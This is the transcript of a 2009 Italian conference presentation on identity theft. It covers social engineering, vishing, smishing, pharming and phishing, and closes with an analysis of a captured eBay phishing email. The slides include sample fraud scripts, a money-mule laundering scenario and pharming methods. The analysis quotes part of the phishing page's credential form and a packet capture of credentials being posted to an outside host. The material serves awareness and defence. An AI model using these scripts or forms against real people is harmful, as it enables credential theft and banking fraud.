Identity management Access nel web 2.0 Associazione Aica, Genova, 15 Settembre 2009

Transcript

1 Identity management Access nel web 2.0 Associazione Aica, Genova, 15 Settembre 2009 Maurizio Aiello Consiglio Nazionale delle Ricerche Istituto di Elettronica ed Ingegneria dell'informazione e delle Telecomunicazioni

2 Furto di identità Social Engineering Phishing Vishing (Voice Phishing) Smishing (Sms phishing) Pharming (Attacchi DNS)

3 Social Engineering Studio del comportamento individuale al fine di carpire informazioni Migliore tecnica di crittanalisi attuale Footprinting, studio dello stile vocale, oppressione psicologica, tecnica della riconoscenza, richiesta di aiuto, boxing, etc. Kevin Mitnick, The Art of Deception

4 Vishing Voice Phishing Basato su Voice messaging IP per praticare attacchi di social engineering volti al furto di dati (personali, finanziari, confidenziali) Perchè IP? Linee fisse sono controllabili meglio (individuazione del chiamante), inoltre in questo modo posso fare chiamate da tutto il mondo gratis.

5 Vishing: motivi del successo 1) maggior fiducia sul vettore telefono piuttosto che sulla mail 2) Maggior diffusione del telefono piuttosto che della mail (soprattutto anziani); 3) Accettazione generalizzata dei sistemi a risponditore automatico. 4) Modalità di comunicazione sincrona (rapidità d'azione) 5) Maggior personalizzazione del messaggio che costituisce l'attacco 6) Call-center <-> co.co.pro. <-> accento straniero

6 Vishing: informazioni carpite Informazioni richieste:compleanno, dettagli carta di credito e bancomat (expiration date, security codes, pin), documenti (passaporto, National Ids). 1) Accesso ai conti bancari Utilizzi dell'attacco: 2) Acquisto beni su Internet e nel mondo reale 3) Trasferimento denaro e riciclaggio (vedi prossima slide) Falsificazione documenti (ad un controllo telematico tutto è ok).

7 Scenario: riciclaggio Ad Alice (Italia) vengono rubate le credenziali di accesso al conto Bob viene convinto tramite vishing ad effettuare transazioni Italia Estero trattenendosi il 10% Eve riceve da Bob il 90% dei soldi rubati ad Alice. Vantaggi: Italia Italia non ci sono controlli da parte della banca Le indagini si concentrano su Bob inizialmente (guadagno di tempo).

8 Vishing: technological benefit Telefoni raggiunti da ogni parte del mondo (e.g. Skype?) Costi minimi Mascheramento o impersonificazione del caller-id War dialing (automatizzazione), con creazione software di call-center fake. Difficoltà a effettuare il filtraggio (come invece avviene per il phishing) Proxy per il routing internazionale dei messaggi

9 Vishing: technoogical benefits Malware per diffusione e scalabilità del message delivery Riconoscimento dei toni per acquisire numeri Riconoscimento vocale automatizzato per acquisire altri dati personali

10 Vishing: esempio tramite Attacco simile al phishing, al posto dell'url c'è un numero di telefono da chiamare (Nazionale! Vedi skype) Caro cliente,... Banca XXX per proteggere i tuoi soldi ha bloccato il conto. Chiama lo 02/ per verificare i tuoi dati. Si esegue la chiamata, 4 o più scelte: 1 per movimenti e saldo conto 2 per effettuare transazioni 3 per sbloccare un conto bloccato 0 per parlare con un operatore

11 Vishing: Dobbiamo verificare... e in rapida successione: Numero di conto Data e luogo di nascita Numero di carta d'identità Pin e codici vari per l'accesso via Internet Alla fine viene effettuato il trasferimento verso operatore: Vero, rerouting verso call center reale Fake, cade la linea

12 Skype:numero regionale

13 Vishing: esempio voic Spingono a effettuare risposte immediate basate su bisogni effettivi: Come da lei richiesto domani sarà chiusa l'erogazione di corrente elettrica presso la sua abitazione. Per il saldo finale, le informazioni relative e per parlare con un operatore chiami il 02/ Varianti e add-ons: Si chiama un numero a pagamento (899...) Si mettono in piedi veri call-center alternativi ai risponditori automatici

14 Vishing: varianti Interviste a pagamento, al termine si chiedono tutti i dettagli (e qualcosa in più :-) del conto corrente per l'accredito Dumpster boxing: individuato il soggetto si cerca nel suo trash (es. le ricevute dei prelievi bancomat) e si eseguono attacchi personalizzati basati su conoscenza di fatti riservati (es. num. Bancomat o carta di credito)

15 Vishing:tracciabilità Chiamate uscenti: Fake caller-id Chiamate voip da internet, stessa difficoltà che tracciare un pc che commette abusi Chiamate entranti verso un call-center fake: Linea telefonica registrata con documenti falsi Linea voip (es. Skype): riesco a trovare gli estremi della carta di credito del criminale e basta User skype rubato, addebiti pagati con carte rubate.

16 Vishing: mms e sms E' stata richiesta l'apertura di un nuovo fido su Banca XXX; in caso questa richiesta non sia autorizzata da lei contattare 02/ Da proprio provider telefonico: hai superato il limite di traffico gratuito del mese: rispondi con il tuo codice della carta di credito per avere ulteriore traffico a 3euro. Scarica loghi, suonerie, gratuitamente!!!

17 Smishing: SMS Phishing Invio di sms fake tramite software ad-hoc che consente la manipolazione del mittente: software firesms siti smsforge.net, (da verificare) Attenzione, chiami il numero xxxxxxx di Servizi Interbancari per verificare la transazione della sua carta di credito al fine di evitarne usi fraudolenti Richiesta codici (voce preregistrata) e successiva attesa operatore non disponibile.

18 Smishing: converging technologies Lo hook (entità che cattura le informazioni) può essere sia un sito web (phishing) che un call-center (vishing) Si possono usare sia i telefoni sms che i gateway web per inviare i messaggi sms fake Si sono visti troiani (eliles.a) che si installano sul pc, si propagano come worm, tramite sms gateway fanno smishing con il target di inserire un troiano dentro Nokia N60.

19 Smishing: SMS Phising Motivi del successo: accettazione del cellulare come mezzo più riservato della posta elettronica (falso, war dialing, elenchi su web, vendita usato etc.) Accettazione della chiamata da/verso call center più facilmente che non contatto tramite web Truffa ai danni di Carta Sì, usando come mittente TIM o VISA.

20 Pharming Dopo attacco (spoofed server) Il server spoofed si presenta identico in tutte le sue forme a quello originale!! (normale phishing)

21 Pharming: motivi successo Di solito si controllano i link: No possibilità di controllo (dovrei interrogare DNS autonomi) Siti clonati perfettamente (ad es. acquistando un conto vero e facendo prove).

22 Pharming: info rubate Normale transazione: user, password, pincode vari richiesti durante la transazione Dati aggiuntivi richiesti ad-hoc: anagrafica, altri conti, assicurazioni, familiari etc.

23 Pharming: tecnologia Intrusione e modifica del Dns del provider della banca o via social engineering o tramite attacco diretto Dns cache poisoning sul provider della vittima Inserimento di troiano nel pc vittima e modifica del file c:\windows\system32\drivers\etc Inserimento di troiano nel pc vittima e modifica del registro con cambiamenti dei dns predefiniti.

24 Pharming: difese Buon antivirus Personal Firewall con controllo di accesso siti (quasi infattibile nella realtà Controllo dei certificati digitali offerti dai server (quasi certamente non eseguito)

25 Pharming: varianti e to-do Man in the middle attacks: le informazioni vengono carpite, usate per autenticarsi sul server vero e di conseguenza mostrate all'utente, aumentando la confidenza e la sensazione di sicurezza dello stesso.

26 Phishing Attacco proveniente da Solite tecniche di social engineering (il conto verrà chiuso, ci sono degli addebiti anomali, controllo delle credenziali etc.)

27 Phishing: tecnologia SMTP sender address spoofing Riproduzione fedele dei loghi e indirizzi di posta nella mail Riproduzione fedele del layout del sito (e.g. Usando ffline browsers) Offuscamento dei link (banale, oppure utilizzando indirizzi ip al posto dei link, o indirizzi ip in notazione tutta numerica

28 Phishing: esempio pratico

29 Phihing: analisi header Received: from nameserver.ge.cnr.it (nameserver.ge.cnr.it [ ]) by gentoo2.ieiit.cnr.it (Postfix) with ESMTP id 002C41FB6AD for Wed, 2 Jan :15: (CET) X-Greylist: delayed 548 seconds by postgrey-1.16 at nameserver.ge.cnr.it; Wed, 02 Jan :30:19 CET Received: from mail.ispotclothing.com (unknown [ ]) by nameserver.ge.cnr.it (Postfix) with ESMTP id 859CB1827B for <aiello@ Wed, 2 Jan :30: (CET) Received: from User by mail.ispotclothing.com with SMTP (Code-Crafters Ability Mail Server 2.55); Wed, 02 Jan :21: Reply-To: <member@ebay, it.ge.cnr.it> From: "Utente di ebay: goldenmovie" <member@ebay.it> Subject: Hai ricevuto una domanda sull'oggetto Date: Wed, 2 Jan :21:

30 Phishing: esempio pratico Contenuto di zmail.ru:

31 Phishing: analisi codice <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" " <meta http-equiv="content-type" content="text/html; charset=iso "><!--srcid: SignIn--> <title>benvenuto su ebay</title><script language="javascript"><!-- var pagename = "PageSignIn"; //--></script><script language="javascript"><!--... href=" nt_ssl_e5431it.css" media="all" rel="stylesheet"> </head> <body bgcolor="#ffffff" onload="doframesbuster();">......

32 Phishing: analisi codice <form method="post" name="signinform" onsubmit="setoptimcookie();" style="margin:0px" action= method=post enctype=x-www-form-urlencoded> <INPUT type=hidden value=yahoo name=mail_from> <INPUT type=hidden name=mail_to> <INPUT type=hidden value=ita name=mail_subject> <INPUT type=hidden value= <INPUT type=hidden value=0 name=smauthreason> <INPUT type=hidden value= name=target>... ID utente <td><input type="text" name="userid" maxlength="64" tabindex="1" value="" size="27"></td> <a name="password" style="text-decoration:none">password </a></td> <td><input type="password" name="pass" maxlength="64" value="" tabindex="2" size="27"></td>

33 Phishing: analisi diretta Basta perder tempo! Address A Address B Packets Bytes Packets A->B Bytes A->B Packets A<-B Bytes A<-B Risoluzione Tipo local_pc pages.ebay.it inversa local_pc www2.kjps.net inversa poi con la diretta scopro local_pc www2.fiberbit.net local_pc local_pc local_pc Akamai whois, inversa local_pc local_pc local_pc

34 Analisi pcap POST /form/mailto.cgi HTTP/1.1 Host: www2.fiberbit.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv: ) Gecko/ Firefox/ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO ,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 228 Mail_From=Yahoo&Mail_To=cicciobello570%40hotmail.it&Mail_Subject=ITA&Next_Page=http%3A%2F%2Fwww.ebay.it %2F&SMAUTHREASON=0&TARGET=http%3A%2F%2Folgutza.nm.ru%2Fbpol%2Fcartepre%2Fgrazie.txt&userid=ci cciociccio&pass=ciaobello HTTP/ Found Date: Wed, 02 Jan :28:55 GMT Server: Apache/ (Unix) Location: Keep-Alive: timeout=2, max=19 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso